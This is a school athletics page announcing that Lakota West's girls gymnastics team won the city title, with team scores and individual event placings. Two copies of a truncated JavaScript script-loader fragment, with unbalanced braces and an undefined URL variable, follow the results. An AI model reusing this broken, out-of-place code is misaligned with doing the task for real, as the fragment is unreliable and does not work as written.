Gymnastics

Lakota West Gymnastics… City Champions 4th year in a row!!

Congrats to our Girls Gymnastics team. They’ve been crowned Queens on the Queen City for the 4th year in a row! #VeryProud #WestPride

All-District
Addison Kennedy
Nilaa Elangovan
Madelyn Power
Addy Shultz

Team-
1.Lakota West- 133.45
2.Anderson- 132.675
3.Lakota East- 129.30
4.Turpin- 127.675
5Kings- 125.075
6.Oak Hills- 102.25
7.Seven Hills- 90.95

All-Around-
6.Addison Kennedy- 33.175
7.Madelyn Power- 33.125

Vault-
5.Madelyn Power- 8.2

Bars-
2.Addy Shultz- 8.6

Beam-
3.Addy Shultz- 8.75
6.Nilaa Elangovan- 8.6

Floor-
8.Addison Kennedy- 8.95
9.Madelyn Power- 8.95

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts